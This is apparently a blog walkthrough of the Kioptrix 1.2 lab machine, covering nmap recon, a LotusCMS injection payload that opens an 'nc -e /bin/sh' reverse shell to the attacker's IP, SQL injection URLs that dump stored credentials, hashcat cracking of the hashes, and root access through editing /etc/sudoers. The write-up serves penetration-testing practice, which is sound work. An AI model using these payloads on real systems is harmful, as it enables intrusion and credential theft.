Kioptrix 1.2 (#3)

Description

According to description supplied by author himself:

Recon

After booting up the machine I had to find out what IP it was given by DHCP. In order to do that I ran a ping sweep over entire subnetwork using nmap.

# nmap -sP 192.168.0.0/24 -n
-- snip --
Nmap scan report for 192.168.0.101
Host is up (0.00029s latency).
MAC Address: 00:0C:29:05:D6:2E (VMware)
-- snip --
# echo 192.168.0.101 kioptrix3.com >> /etc/hosts
# nmap kioptrix3.com -sT -sV -O
-- snip --
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
-- snip --

Low privlege shell

Low privleges can be acquired in more than one way. So far, I found two ways:

Lotus CMS Remote Code Execution

Starting looks like some kind of cms or blog engine. Indeed, login page confirms it is a LotusCMS.

LotusCMS login page
index');${system('nc -e /bin/sh 192.168.0.103 443')};#
http://kioptrix3.com/index%27%29%3B%24%7Bsystem%28%27nc%20-e%20%2Fbin%2Fsh%20192.168.0.103%20443%27%29%7D%3B%23
Reverse shell
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
# python -c 'import pty; pty.spawn("/bin/sh")'
# mysql -uroot -p
Enter password: fuckeyou
-- snip --
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| gallery |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql> use gallery;
-- snip --
Database changed
mysql> show tables;
+----------------------+
| Tables_in_gallery |
+----------------------+
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
+----------------------+
7 rows in set (0.01 sec)
mysql> SELECT * FROM dev_accounts;
+----+------------+----------------------------------+
| id | username | password |
+----+------------+----------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+
2 rows in set (0.00 sec)

Gallarific SQL Injection

There is also a way of obtaining this information without actual shell. In the Gallarific application I found a SQL Injection vulnerability by adding an apostrophe character to ID parameter:

http://kioptrix3.com/gallery/gallery.php?id=1%27%20&sort=photoid#photos
SQL error after inserting apostrophe to parameter
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6%20--&sort=photoid#photos
UNION’d values visible on the site
http://kioptrix3.com/gallery/gallery.php?id=-1%20UNION%20SELECT%201,2,GROUP_CONCAT(table_name),4,5,6%20FROM%20information_schema.tables%20WHERE%20table_schema=database()--&sort=photoid#photos
List of tables from the server
http://kioptrix3.com/gallery/gallery.php?id=-1%20UNION%20SELECT%201,2,group_concat(column_name),4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name=%27dev_accounts%27%20--&sort=photoid#photos
Dev_accounts column
http://kioptrix3.com/gallery/gallery.php?id=-1%20UNION%20SELECT%201,username,password,4,5,6%20FROM%20dev_accounts%20--&sort=photoid#photos
Credentials listed

Privlege escalation

Credentials reversal

No matter how we obtained the credentials in the previous step, we need to reverse the password hash. I pasted those hashes to a hashes.txt file on attackers machine and used hashcat to crack them:

# hashcat64.exe -m0 -a 0 hashes.txt rockyou.txt
-- snip --
5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r
-- snip --
# ssh loneferret@kioptrix3.com
-- snip --
loneferret@kioptrix3.com's password: starwars
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

Escalating privleges

On the victim machine I checked the /home dir. There is an interesting txt file in loneferret’s folder:

# cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
ht
Opening file
loneferret ALL=(ALL) ALL
Modified /etc/sudoers
loneferret@Kioptrix3:~$ sudo bash
[sudo] password for loneferret: starwars
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:~# cd /root
root@Kioptrix3:/root# ls
Congrats.txt ht-2.0.18

Summary

That’s it! We’ve rooted Kioptrix 1.2 ;) Even though the challenge required more steps than previous ones in the series, it was still quite easy. For me the biggest challenge was to learn how to use the ht application. The hack itself was quite straightforward. Bear in mind though that difficulty is very subjective with those :)

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store